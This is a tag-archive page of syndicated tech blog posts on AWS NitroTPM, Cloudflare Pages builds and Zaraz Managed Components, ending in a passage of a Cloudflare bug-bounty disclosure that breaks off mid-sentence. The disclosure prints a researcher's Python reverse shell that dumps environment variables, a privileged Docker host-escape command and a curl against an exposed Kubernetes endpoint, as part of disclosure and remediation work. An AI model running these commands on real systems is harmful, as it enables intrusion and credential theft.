Tag Archives: security

Amazon EC2 Now Supports NitroTPM and UEFI Secure Boot

Post Syndicated from Sébastien Stormacq original https://aws.amazon.com/blogs/aws/amazon-ec2-now-supports-nitrotpm-and-uefi-secure-boot/

In computing, Trusted Platform Module (TPM) technology is designed to provide hardware-based, security-related functions. A TPM chip is a secure crypto-processor that is designed to carry out cryptographic operations. There are three key advantages of using TPM technology. First, you can generate, store, and control access to encryption keys outside of the operating system. Second, you can use a TPM module to perform platform device authentication by using the TPM’s unique RSA key, which is burned into it. And third, it may help to ensure platform integrity by taking and storing security measurements.

During re:Invent 2021, we announced the future availability of NitroTPM, a virtual, TPM 2.0-compliant module for your Amazon Elastic Compute Cloud (Amazon EC2) instances, based on the AWS Nitro System. We also announced Unified Extensible Firmware Interface (UEFI) Secure Boot availability for EC2.

I am happy to announce that you can start using both NitroTPM and UEFI Secure Boot today in all AWS Regions outside of China, including the AWS GovCloud (US) Regions.

You can use NitroTPM to store secrets, such as disk encryption keys or SSH keys, outside of the EC2 instance memory, protecting them from applications running on the instance. NitroTPM leverages the isolation and security properties of the Nitro System to ensure only the instance can access these secrets. It provides the same functions as a physical or discrete TPM. NitroTPM follows the ISO TPM 2.0 specification, allowing you to migrate existing on-premises workloads that leverage TPMs to EC2.

The availability of NitroTPM unlocks a couple of use cases to strengthen the security posture of your EC2 instances, such as secured key storage and access for OS-level volume encryption or platform attestation for measured boot or identity access.

Secured Key Storage and Access
NitroTPM can create and store keys that are wrapped and tied to certain platform measurements (known as Platform Configuration Registers – PCR). NitroTPM unwraps the key only when those platform measurements have the same value as they had at the moment the key was created. This process is referred to as “sealing the key to the TPM.” Decrypting the key is called unsealing. NitroTPM only unseals keys when the instance and the OS are in a known good state. Operating systems compliant with TPM 2.0 specifications use this mechanism to securely unseal volume encryption keys. You can use NitroTPM to store encryption keys for BitLocker on Microsoft Windows. Linux Unified Key Setup (LUKS) or dm-verity on Linux are examples of OS-level applications that can leverage NitroTPM too.
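
On a Linux instance, you can check that the TPM is visible and inspect PCR values before relying on sealing. The commands below are a minimal sketch using the standard tpm2-tools and systemd-cryptenroll utilities; the device name /dev/xvdf and the PCR selection are illustrative assumptions, not values from this post.

ls /dev/tpm*                                   # expect /dev/tpm0 and /dev/tpmrm0 when NitroTPM is enabled
sudo tpm2_pcrread sha256:0,4,7                 # dump the current SHA-256 PCR values
# Bind a LUKS volume key to PCR 7 (Secure Boot state); requires systemd 248 or later
sudo systemd-cryptenroll --tpm2-device=auto --tpm2-pcrs=7 /dev/xvdf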

Platform Attestation
Another key feature that NitroTPM provides is “measured boot,” a process where the bootloader and operating system extend PCRs with measurements of the software or configuration that they load during the boot process. This improves security in the event that, for example, a malicious program overwrites part of your kernel with malware. With measured boot, you can also obtain signed PCR values from the TPM and use them to prove to remote servers that the boot state is valid, enabling remote attestation support.

How to Use NitroTPM
There are three prerequisites to start using NitroTPM:

  • You must use an operating system that has Command Response Buffer (CRB) drivers for TPM 2.0, such as recent versions of Windows or Linux. We tested the following OSes: Red Hat Enterprise Linux 8, SUSE Linux Enterprise Server 15, Ubuntu 18.04, Ubuntu 20.04, and Windows Server 2016, 2019, and 2022.
  • You must deploy it on a Nitro-based EC2 instance. At the moment, we support all Intel and AMD instance types that support UEFI boot mode. Graviton1, Graviton2, Xen-based, Mac, and bare-metal instances are not supported. Note that NitroTPM does not work today with some additional instance types, but support for them will come soon after launch: C6a, C6i, G4ad, G4dn, G5, Hpc6a, I4i, M6a, M6i, P3dn, R6i, T3, T3a, U-12tb1, U-3tb1, U-6tb1, U-9tb1, X2idn, X2iedn, and X2iezn.
  • When you create your own AMI, it must be flagged to use UEFI as the boot mode and NitroTPM. Windows AMIs provided by AWS are flagged by default. Linux-based AMIs are not flagged by default; you must create your own.

How to Create an AMI with TPM Enabled
AWS provides AMIs for multiple versions of Windows with TPM enabled. I can verify whether an AMI supports NitroTPM using the DescribeImages API call. For example:

aws ec2 describe-images --image-ids ami-0123456789

When NitroTPM is enabled for the AMI, "TpmSupport": "v2.0" appears in the output, as in the following example.

{
   "Images": [
      {
         ...
         "BootMode": "uefi",
         "TpmSupport": "v2.0"
      }
   ]
}

I may also query for tpmSupport using the DescribeImageAttribute API call.
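
For example, a minimal sketch of that attribute query, reusing the placeholder AMI ID from above:

aws ec2 describe-image-attribute \
       --image-id ami-0123456789 \
       --attribute tpmSupport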

When creating my own AMI, I may enable TPM support using the RegisterImage API call, by setting boot-mode to uefi and tpm-support to v2.0.

aws ec2 register-image             \
       --region us-east-1           \
       --name my-image              \
       --boot-mode uefi             \
       --architecture x86_64        \
       --root-device-name /dev/xvda \
       --block-device-mappings DeviceName=/dev/xvda,Ebs={SnapshotId=snap-0123456789example} DeviceName=/dev/xvdf,Ebs={VolumeSize=10} \
       --tpm-support v2.0

Now that you know how to create an AMI with TPM enabled, let’s create a Windows instance and configure BitLocker to encrypt the root volume.

A Walkthrough: Using NitroTPM with BitLocker
BitLocker automatically detects and uses NitroTPM when available. There is no extra configuration step beyond what you do today to install and configure BitLocker. Upon installation, BitLocker recognizes the TPM module and starts to use it automatically.

Let’s go through the installation steps. I start the instance as usual, using an AMI that has both uefi and TPM v2.0 enabled. I make sure I use a supported version of Windows. Here I am using Windows Server 2022 04.13.

Once connected to the instance, I verify that Windows recognizes the TPM module. To do so, I launch the tpm.msc application, and the Trusted Platform Module (TPM) Management window opens. When everything goes well, it shows Manufacturer Name: AMZN under TPM Manufacturer Information.

Trusted Platform Module Management
Next, I install BitLocker.

I open the servermanager.exe application and select Manage at the top right of the screen. In the dropdown menu, I select Add Roles and Features.

Add roles and features
I select Role-based or feature-based installation from the wizard.

Install BitLocker - Step 1
I select Next multiple times until I reach the Features section. I select BitLocker Drive Encryption, and I select Install.

Install BitLocker - Step 2
I wait a bit for the installation and then restart the server at the end of the installation.

After reboot, I reconnect to the server and open the control panel. I select BitLocker Drive Encryption under the System and Security section.

Turn on Bitlocker - part 1
I select Turn on BitLocker, and then I select Next and wait for the verification of the system and the time it takes to encrypt my volume’s data.

Just for extra safety, I decide to reboot at the end of the encryption. It is not strictly necessary, but since I encrypted the root volume of the machine (C:), I want to confirm that the machine can still boot.

After the reboot, I reconnect to the instance, and I verify the encryption status.

Turn on Bitlocker - part 2
I also verify BitLocker’s status and key protection method enabled on the volume. To do so, I open PowerShell and type

manage-bde -protectors -get C:

Bitlocker status
I can see on the resulting screen that the C: volume encryption key is coming from the NitroTPM module and the instance used Secure Boot for integrity validation. I can also view the recovery key.

I left the recovery key in plain text in the previous screenshot because the instance and volume I used for this demo will no longer exist by the time you read this. Do not share your recovery keys publicly otherwise.

Important Considerations
Now that I have shown how to use NitroTPM to protect BitLocker’s volume encryption key, I’ll go through a couple of additional considerations:

  • You can only enable an AMI for NitroTPM support by using the RegisterImage API via the AWS CLI and not via the Amazon EC2 console.
  • NitroTPM support is enabled by setting a flag on an AMI. After you launch an instance with the AMI, you can’t modify the attributes on the instance. The ModifyInstanceAttribute API is not supported on running or stopped instances.
  • Importing or exporting EC2 instances with NitroTPM, such as with the ImportImage API, will omit NitroTPM data.
  • The NitroTPM state is not included in EBS snapshots. You can only restore an EBS snapshot to the same EC2 instance.
  • BitLocker volumes that are encrypted with TPM-based keys cannot be restored on a different instance. It is possible to change the instance type (stop, change instance type, and restart it).

At the moment, we support all Intel and AMD instance types that support UEFI boot mode. Graviton1, Graviton2, Xen-based, Mac, and bare-metal instances are not supported. Some additional instance types are not supported at launch (I shared the exact list previously); we will add support for these soon after launch.

There is no additional cost for using NitroTPM. It is available today in all AWS Regions, including the AWS GovCloud (US) Regions, except in China.

And now, go build 😉

— seb

A new era for Cloudflare Pages builds

Post Syndicated from Nevi Shah original https://blog.cloudflare.com/cloudflare-pages-build-improvements/

Music is flowing through your headphones. Your hands are flying across the keyboard. You’re stringing together a masterpiece of code. The momentum is building up as you put on the finishing touches of your project. And at last, it’s ready for the world to see. Heart pounding with excitement and the feeling of victory, you push changes to the main branch… only to end up waiting for the build to execute each step and spit out the build logs.

Starting afresh

Since the launch of Cloudflare Pages, there is no doubt that the build experience has been its biggest source of criticism. From the amount of waiting to the inflexibility of the CI workflow, Pages had a lot of opportunity for growth and improvement. With Pages, our North Star has always been designing a developer platform that fits right into your workflow and oozes simplicity. User pain points have been and always will be our priority, which is why today we are thrilled to share a list of exciting updates to our build times, logs, and settings!

Over the last three quarters, we implemented a new build infrastructure that speeds up Pages builds, so you can iterate quickly and efficiently. In February, we soft released the Pages Fast Builds Beta, allowing you to opt in to this new infrastructure on a per-project basis. This not only allowed us to test our implementation, but also gave our community the opportunity to try it out and give us direct feedback in Discord. Today we are excited to announce the new build infrastructure is now generally available and automatically enabled for all existing and new projects!

Faster build times

As a developer, your time is extremely valuable, and we realized Pages builds were slow. It was obvious that creating an infrastructure that built projects faster and smarter was one of our top requirements.

Looking at a Pages build, there are four main steps: (1) initializing the build environment, (2) cloning your git repository, (3) building the application, and (4) deploying to Cloudflare’s global network. Each of these steps is a crucial part of the build process, and upon investigating areas suitable for optimization, we directed our efforts to cutting down on build initialization time.

In our old infrastructure, every time a build job was submitted, we created a new virtual machine to run that build, costing our users precious dev time. In our new infrastructure, we start jobs on machines that are ready and waiting to be used, taking a major chunk of time away from the build initialization step. This step previously ran for 2+ minutes, but with our new infrastructure update, projects are expected to see a build initialization time cut down to 2-3 SECONDS.

This means less time waiting and more time iterating on your code.

Fast and secure

In our old build infrastructure, because we spun up a new virtual machine (VM) for every build, it would take several minutes to boot up and initialize with the Pages build image needed to execute the build. Alternatively, one could reuse a pool of containers, assigning a new build to the next available container, but containers share a kernel with the host operating system, making them far less isolated and posing a huge security risk. This could allow a malicious actor to perform a “container escape” to break out of their sandbox. We wanted the best of both worlds: the speed of a container with the isolation of a virtual machine.

Enter gVisor, a container sandboxing technology that drastically limits the attack surface of a host. In the new infrastructure, each container running with gVisor is given its own independent application “kernel,” instead of directly sharing the kernel with its host. Then, to address the speed, we keep a cluster of virtual machines warm and ready to execute builds so that when a new Pages deployment is triggered, it takes just a few seconds for a new gVisor container to start up and begin executing meaningful work in a secure sandbox with near native performance.

Stream your build logs

After we solidified a fast and secure build, we wanted to enhance the user-facing build experience. Because a build may not be successful every time, providing you with the tools you need to debug and access that information as fast as possible is crucial. While we have a long list of future improvements for a better logging experience, today we are starting by enabling you to stream your build logs.

Prior to today, with the aforementioned build steps required to complete a Pages build, you had to wait until the build completed in order to view the resulting build logs. Easily addressable issues, like incorrectly entering the build command or misconfiguring an environment variable, required waiting for the entire build to finish before understanding the problem.

Today, we’re giving you the power to understand your build issues as soon as they happen. Spend less time waiting for your logs and start debugging the events of your builds within a second or less after they happen!

Control Branch Builds

Finally, the build experience does not just include the events during execution but everything leading up to the trigger of a build. For our final trick, we’re enabling our users to have full control of the precise branches they’d like to include and exclude for automatic deployments.

Before today, Pages submitted builds for every commit in both production and preview environments, which led to queued builds and even more waiting if you exceeded your concurrent build limit. We wanted to provide even more flexibility to control your CI workflow. Now you can configure your build settings to specify branches to build, as well as skip ad hoc commits.

Specify branches to build

While “unlimited staging” is one of Pages’ greatest advantages, depending on your setup, sometimes automatic deployments to the preview environment can cause extra noise.

In the Pages build configuration setting, you can specify automatic deployments to be turned off for the production environment, the preview environment, or specific preview branches. In a more extreme case, you can even pause all deployments so that any commit sent to your git source will not trigger a new Pages build.

Additionally, in your project’s settings, you can now configure the specific Preview branches you would like to include and exclude for automatic deployments. To make this configuration an even more powerful tool, you can use wildcard syntax to set rules for existing branches as well as any newly created preview branches.
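
For illustration, a project could include only release branches for Preview deployments and exclude bot-generated ones. The patterns below are hypothetical examples of the wildcard syntax, not settings taken from a real project:

Include Preview branches: release/*
Exclude Preview branches: dependabot/*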

Read more in our Pages docs on how to get started with configuring automatic deployments with Wildcard Syntax.

Using CI Skip

Sometimes commits need to be skipped on an ad hoc basis. A small update to copy or a set of changes within a small timespan don’t always require an entire site rebuild. That’s why we also implemented a CI Skip command for your commit message, signaling to Pages that the update should be skipped by our builder.
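
For ad hoc skips, the marker goes straight into the commit message. A minimal sketch (the commit text itself is hypothetical):

git commit -m "Update copy on the landing page [CI Skip]"
git push origin main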

With both CI Skip and configured build rules, you can keep track of your site changes in Pages’ deployment history.

Where we’re going

We’re extremely excited to bring these updates to you today, but of course, this is only the beginning of improving our build experience. Over the next few quarters, we will be bringing more to the build experience to create a seamless developer journey from site inception to launch.

Incremental builds and caching

From beta testing, we noticed that our new infrastructure can be less impactful on larger projects that use heavier frameworks such as Gatsby. We believe that every user on our developer platform, regardless of their use case, has the right to fast builds. Up next, we will be implementing incremental builds to help Pages identify only the deltas between commits and rebuild only files that were directly updated. We will also be implementing other caching strategies such as caching external dependencies to save time on subsequent builds.

Build image updates

Because we’ve been using the same build image we launched Pages with back in 2021, we are going to make some major updates. Languages release new versions all the time, and we want to make sure we update and maintain the latest versions. An updated build image will mean faster builds, more security and of course supporting all the latest versions of languages and tools we provide. With new build image versions being released, we will allow users to opt in to the updated builds in order to maintain compatibility with all existing projects.

Productive error messaging

Lastly, while streaming build logs helps you to identify those easily addressable issues, the infamous “Internal error occurred” is sometimes a little more cryptic to decipher depending on the failure. While we recently published a “Debugging Cloudflare Pages” guide, in the future we’d like to provide the error feedback in a more productive manner, so you can easily identify the issue.

Have feedback?

As always, your feedback defines our roadmap. With all the updates we’ve made to our build experience, it’s important we hear from you! You can get in touch with our team directly through Discord. Navigate to our Pages specific section and check out our various channels specific to different parts of the product!

Join us at Cloudflare Connect!

Interested in learning more about building with Cloudflare Pages? If you’re based in the New York City area, join us on Thursday, May 12th for a series of workshops on how to build a full stack application on Pages! Follow along with a fully hands-on lab, featuring Pages in conjunction with other products like Workers, Images and Cloudflare Gateway, and hear directly from our product managers. Register now!

Open source Managed Components for Cloudflare Zaraz

Post Syndicated from Yo'av Moshe original https://blog.cloudflare.com/zaraz-open-source-managed-components-and-webcm/

In early 2020, we sat down and tried thinking if there’s a way to load third-party tools on the Internet without slowing down websites, without making them less secure, and without sacrificing users’ privacy. In the evening, after scanning through thousands of websites, our answer was “well, sort of”. It seemed possible: many types of third-party tools are merely collecting information in the browser and then sending it to a remote server. We could theoretically figure out what it is that they’re collecting, and then instead just collect it once efficiently, and send it server-side to their servers, mimicking their data schema. If we do this, we can get rid of loading their JavaScript code inside websites completely. This means no more risk of malicious scripts, no more performance losses, and fewer privacy concerns.

But the answer wasn’t a definite “YES!” because we realized this is going to be very complicated. We looked into the network requests of major third-party scripts, and often it seemed cryptic. We set ourselves up for a lot of work, looking at the network requests made by tools and trying to figure out what they are doing – What is this parameter? When is this network request sent? How is this value hashed? How can we achieve the same result more securely, reliably and efficiently? Our team faced these questions on a daily basis.

When we joined Cloudflare, the scale of everything changed. Suddenly we were on thousands of websites, serving more than 10,000 requests per second. Users are writing to us every single day over our Discord channel, the community forum, and sometimes even directly on Twitter. More often than not, their messages would be along the lines of “Hi! Can you please add support for X?” Cloudflare Zaraz launched with around 30 tools in its library, but this market is vast and new tools are popping up all the time.

Changing our trust model

In my previous blog post on how Zaraz uses Cloudflare Workers, I included some examples of how tool integrations are written in Zaraz today. Usually, a “tool” in Zaraz would be a function that prepares a payload and sends it. This function could return one thing – clientJS, JavaScript code that the browser would later execute. We’ve done our best so that tools wouldn’t use clientJS, if it wasn’t really necessary, and in reality most Zaraz-built tool integrations are not using clientJS at all.

This worked great, as long as we were the ones coding all tool integrations. Customers trusted us that we’d write code that is performant and safe, and they trusted the results they saw when trying Zaraz. Upon joining Cloudflare, many third-party tool vendors contacted us and asked to write a Zaraz integration. We quickly realized that our system wasn’t enforcing speed and safety – vendors could literally just dump their old browser-side JavaScript into our clientJS variable, and say “We have a Cloudflare Zaraz integration!”, and that wasn’t our vision at all.

We want third-party tool vendors to be able to write their own performant, safe server-side integrations. We want to make it possible for them to reimagine their tools in a better way. We also want website owners to have transparency into what is happening on their website, to be able to manage and control it, and to trust that if a tool is running through Zaraz, it must be a good tool — not because of who wrote it, but because of the technology it is constructed within. We realized that to achieve that we needed a new format for defining third-party tools.

Introducing Managed Components

We started rethinking how third-party code should be written. Today, it’s a black box – you usually add a script to your site, and you have zero clue what it does and when. You can’t properly read or analyze the minified code. You don’t know if the way it behaves for you is the same way it behaves for everyone else. You don’t know when it might change. If you’re a website owner, you’re completely in the dark.

Tools do many different things. The simple ones just collect information and send it somewhere. Often, they set some cookies. Sometimes, they install event listeners on the page. And widget-based tools can literally manipulate the page DOM, providing new functionality like a social media embed or a chatbot. Our new format needed to support all of this.

Managed Components is how we imagine the future of third-party tools online. It provides vendors with an API that allows them to do much more than a normal script can, including keeping code execution outside the browser. We designed this format together with vendors, for vendors, while having in mind that users’ best interest is everyone’s best interest long-term.

From the get-go, we built Managed Components to use a permission-based system. We want to provide even more transparency than Zaraz does today. As the new API allows tools to set cookies, change the DOM or collect IP addresses, all those abilities require being granted a permission. Installing a third-party tool on your site is similar to installing an app on your phone – you get an explanation of what the tool can and can’t do, and you can allow or disallow features to a granular level. We previously wrote about how you can use Zaraz to not send IP addresses to Google Analytics, and now we’re doubling down in this direction. It’s your website, and it’s your decision to make.

Every Managed Component is a JavaScript module at its core. Unlike today, this JavaScript code isn’t sent to the browser. Instead, it is executed by a Components Manager. This manager implements the APIs that are then used by the component. It dispatches server-side events that originate in the browser, providing the components with access to information while keeping them sandboxed and performant. It handles caching, storage and more — all so that the Managed Components can implement their logic without worrying so much about their surroundings.

An example analytics Managed Component can look something like this:

export default function (manager) {
  manager.addEventListener("pageview", ({ context, client }) => {
    // Forward the page view to the vendor's collection endpoint, entirely server-side
    fetch("https://example.com/collect", {
      method: "POST",
      headers: { "content-type": "application/json" },
      body: JSON.stringify({
        url: context.page.url.href,
        userAgent: client.device.userAgent,
      }),
    });
  });
}

The above component gets notified whenever a page view occurs, and it then creates some payload with the visitor user-agent and page URL and sends that as a POST request to the vendor’s server. This is very similar to how things are done today, except this doesn’t require running any code at all in the browser.

But Managed Components aren’t just doing what was previously possible but better, they also provide dramatic new functionality. See for example how we’re exposing server-side endpoints:

export default function (manager) {
  // Proxy a third-party API, serve static assets, and expose a custom endpoint,
  // all under the same domain as the website itself
  const api = manager.proxy("/api", "https://api.example.com");
  const assets = manager.serve("/assets", "assets");
  const ping = manager.route("/ping", (request) => new Response(null, { status: 204 }));
}

These three lines are a complete shift in what’s possible for third parties. If granted the permissions, they can proxy content, serve assets, and expose their own endpoints – all under the same domain as the one running the website. If a tool needs to do some processing, it can now off-load that from the browser completely without forcing the browser to communicate with a third-party server.

Exciting new capabilities

Every third-party tool vendor should be able to use the Managed Components API to build a better version of their tool. The API we designed is comprehensive, and the benefits for vendors are huge:

  • Same domain: Managed Components can serve assets from the same domain as the website itself. This allows a faster and more secure execution, as the browser needs to trust and communicate with only one server instead of many. This can also reduce costs for vendors as their bandwidth will be lowered.
  • Website-wide events system: Managed Components can hook to a pre-existing events system that is used by the website for tracking events. Not only is there no need to provide a browser-side API to your tool, it’s also easier for your users to send information to your tool because they don’t need to learn your methods.
  • Server logic: Managed Components can provide server-side logic on the same domain as the website. This includes proxying a different server, or adding endpoints that generate dynamic responses. The options are endless here, and this, too, can reduce the load on the vendor servers.
  • Server-side rendered widgets and embeds: Did you ever notice how, when you’re loading an article page online, the content jumps when some YouTube or Twitter embed suddenly appears between the paragraphs? Managed Components provide an API for registering widgets and embeds that render server-side. This means that when the page arrives at the browser, it already includes the widget in its code. The browser doesn’t need to communicate with another server to fetch some tweet information or styling. It’s part of the page now, so expect a better CLS score.
  • Reliable cross-platform events: Managed Components can subscribe to client-side events such as clicks, scroll and more, without needing to worry about browser or device support. Not only that – those same events will work outside the browser too – but we’ll get to that later.
  • Pre-Response Actions: Managed Components can execute server-side actions before the network response even arrives in the browser. Those actions can access the response object, reading it or altering it.
  • Integrated Consent Manager support: Managed Components are predictable and scoped. The Component Manager knows what they’ll need and can predict what kind of consent is needed to run them.

The right choice: open source

As we started working with vendors on creating a Managed Component for their tool, we heard a repeating concern – “What Components Managers are there? Will this only be useful for Cloudflare Zaraz customers?”. While Cloudflare Zaraz is indeed a Components Manager, and it has a generous free tier plan, we realized we need to think much bigger. We want to make Managed Components available for everyone on the Internet, because we want the Internet as a whole to be better.

Today, we’re announcing much more than just a new format.

WebCM is a reference implementation of the Managed Components API. It is a complete Components Manager that we will soon release and maintain. You will be able to use it as an SDK when building your Managed Component, and you will also be able to use it in production to load Managed Components on your website, even if you’re not a Cloudflare customer. WebCM works as a proxy – you place it before your website, and it rewrites your pages when necessary and adds a couple of endpoints. This makes WebCM 100% framework-agnostic – it doesn’t matter if your website uses Node.js, Python or Ruby behind the scenes: as long as you’re sending out HTML, it supports that.

That’s not all though! We’re also going to open source a few Managed Components of our own. We converted some of our classic Zaraz integrations to Managed Components, and they will soon be available for you to use and improve. You will be able to take our Google Analytics Managed Component, for example, and use WebCM to run Google Analytics on your website, 100% server-side, without Cloudflare.

Tech-leading vendors are already joining

Revolutionizing third-party tools on the internet is something we could only do together with third-party vendors. We love third-party tools, and we want them to be even more popular. That’s why we worked very closely with a few leading companies on creating their own Managed Components. These new Managed Components extend Zaraz capabilities far beyond what’s possible now, and will provide a safe and secure onboarding experience for new users of these tools.

Drift
Drift helps businesses connect with customers in moments that matter most. Drift’s integration will let customers use their fully-featured conversation solution while also keeping it completely sandboxed and without making third-party network connections, increasing privacy and security for our users.

Crazy Egg
Crazy Egg helps customers make their websites better through visual heatmaps, A/B testing, detailed recordings, surveys and more. Website owners, Cloudflare, and Crazy Egg all care deeply about performance, security and privacy. Managed Components have enabled Crazy Egg to do things that simply aren’t possible with third-party JavaScript, which means our mutual customers will get one of the most performant and secure website optimization tools created.

We also already have customers that are eager to implement Managed Components:

Hopin Quote:

“I have been really impressed with Cloudflare’s Zaraz ability to move Drift’s JS library to an Edge Worker while loading it off the DOM. My work is much more effective due to the savings in page load time. It’s a pleasure to work with two companies that actively seek better ways to increase both page speed and load times with large MarTech stacks.”
– Sean Gowing, Front End Engineer, Hopin

If you’re a third-party vendor, and you want to join these tech-leading companies, do reach out to us, and we’d be happy to support you on writing your own Managed Component.

What’s next for Managed Components

We’re working on Managed Components on many fronts now. While we develop and maintain WebCM, work with vendors and integrate Managed Components into Cloudflare Zaraz, we’re already thinking about what’s possible in the future.

We see a future where many open source runtimes exist for Managed Components. Perhaps your infrastructure doesn’t allow you to use WebCM? We want to see Managed Components runtimes created as service workers, HTTP servers, proxies and framework plugins. We’re also working on making Managed Components available on mobile applications. We’re working on allowing unofficial Managed Components installs on Cloudflare Zaraz. We’re fixing a long-standing issue of the WWW, and there’s so much to do.

We will very soon publish the full specs of Managed Components. We will also open source WebCM, the reference implementation server, as well as many components you can use yourself. If this is interesting to you, reach out to us at [email protected], or join us on Discord.

The Cloudflare Bug Bounty program and Cloudflare Pages

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/pages-bug-bounty/

The Cloudflare Pages team recently collaborated closely with security researchers at Assetnote through our Public Bug Bounty. Throughout the process, we found and fully patched the vulnerabilities discovered in Cloudflare Pages. You can read their detailed write-up here. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and we also highlight our bug bounty program, which helps to make our product more secure.

Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our bug bounty program that facilitates and rewards security researchers for their collaboration with us.

But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.

Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.

In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to use the bounty program to work with us to help us make our services — and by extension the Internet — more secure!

What happens when a vulnerability is reported?

Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:

  1. We investigate the issue to understand the criticality of the report.
  2. We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems we start working with engineering immediately, and less urgent issues we track and prioritize alongside engineering’s normal bug fixing cadences.
  3. Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.

This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.

What was discovered in Cloudflare Pages?

The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our CI/CD build pipeline): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an attack surface. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.

When determining impact, it is not enough to find no evidence that a bug was exploited; we must conclusively prove that it was not. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.

However, for one bug, while we found no evidence that it was exploited beyond the work of security researchers, we were not able to meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.

Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.

Bug 1: Command injection in CLONE_REPO

A flaw in our logic during build initialization made it possible to execute arbitrary code, echo environment variables to a file, and then read the contents of that file.

The crux of the bug was that root_dir in this line of code was attacker controlled. After gaining control, the researcher was able to craft a malicious root_dir that dumped the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key. This would have allowed the attacker to read the repositories of other Pages customers, many of which are private.

After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) security researchers. Our logs showed that this was the first time this particular attack had ever been performed, and that it was responsibly reported.

Bug 2: Command injection in PUBLISH_ASSETS

This bug is nearly identical to the first one, but in the publishing step instead of the clone step. We went to work fixing the input validation issues and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.

Bug 3: Cloudflare API key disclosure in the asset publishing process

While building customer pages, a program called /opt/pages/bin/pages-metadata-generator is involved. This program had Linux permissions of 777, allowing all users on the machine to read the program, execute the program, and, most importantly, overwrite the program. If you can overwrite the program prior to its invocation, it might run with higher permissions when the next user comes along and wants to use it.

In this case the attack is simple. When a Pages build runs, the following build.sh is specified to run, and it can overwrite the executable with a new one.

#!/bin/bash
cp pages-metadata-generator /opt/pages/bin/pages-metadata-generator

This allows the attacker to provide their own pages-metadata-generator program that is run with a populated set of environment variables. The proof of concept provided to Cloudflare was this minimal reverse shell.

#!/bin/bash
echo "henlo fren"
export > /tmp/envvars
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x.x",9448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

With a reverse shell, the attackers only need to run `env` to see a list of environment variables that the program was invoked with. We fixed the file permissions of the program, rotated the credentials, and investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.
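
The exact remediation is internal to Cloudflare, but the shape of the permissions fix is straightforward. A minimal sketch, assuming builds run as an unprivileged user:

# Illustrative hardening only: make the shared binary root-owned and not writable by build users
chown root:root /opt/pages/bin/pages-metadata-generator
chmod 0755 /opt/pages/bin/pages-metadata-generator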

Bug 4: Bash path injection

This issue was very similar to Bug 3. The PATH environment variable contained a large set of directories for maximum compatibility with different developer tools.

PATH=/opt/buildhome/.swiftenv/bin:/opt/buildhome/.swiftenv/shims:/opt/buildhome/.php:/opt/buildhome/.binrc/bin:/usr/local/rvm/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/buildhome/.cask/bin:/opt/buildhome/.gimme/bin:/opt/buildhome/.dotnet/tools:/opt/buildhome/.dotnet

Unfortunately, not all of these directories were set to the proper filesystem permissions, allowing a malicious version of the bash program to be written to them and later invoked by the Pages build process. We patched this bug, rotated the impacted credentials, and investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research.
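
A quick way to spot this class of problem is to check every directory on PATH for world-writable permissions. This is a generic sketch, not the check Cloudflare ran:

# List PATH entries that other users can write to (and could therefore plant a fake bash in)
echo "$PATH" | tr ':' '\n' | xargs -I{} find {} -maxdepth 0 -perm -0002 2>/dev/null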

Bug 5: Azure pipelines escape

Back when this research was conducted we were running Cloudflare Pages on Azure Pipelines. Builds were taking place in highly privileged containers and the containers had the docker socket available to them. Once the researchers had root within these containers, escaping them was trivial after installing docker and mounting the root directory of the host machine.

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

Once they had root on the host machine, they were able to recover Azure DevOps credentials from the host which gave access to the Azure Organization that Cloudflare Pages was running within.

The credentials that were recovered gave access to highly audited APIs where we could validate that this issue was not previously exploited outside this security research.

Bug 6: Pages on Kubernetes

After receipt of the above bugs, we decided to change the architecture of Pages. One of these changes was migrating the product from Azure to Kubernetes and simplifying the workflow, so that the attack surface was smaller and defensive programming practices were easier to implement. After the change, Pages builds run within Kubernetes Pods and are seeded with the minimum set of credentials needed.

As part of this migration, we left off a very important iptables rule in our Kubernetes control plane, making it easy to curl the Kubernetes API and read secrets related to other Pods in the cluster (each Pod representing a separate Pages build).

curl -v -k http://10.124.200.1:10255/pods

We quickly patched this issue with iptables rules to block network connections to the Kubernetes control plane. One of the secrets available to each Pod was the GitHub OAuth secret, which would have allowed someone who exploited this issue to read the GitHub repositories of other Pages customers.
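
The production rules are Cloudflare-internal, but conceptually they block Pod egress to the control-plane endpoint probed above. A minimal, hypothetical sketch using the address and port from the proof of concept:

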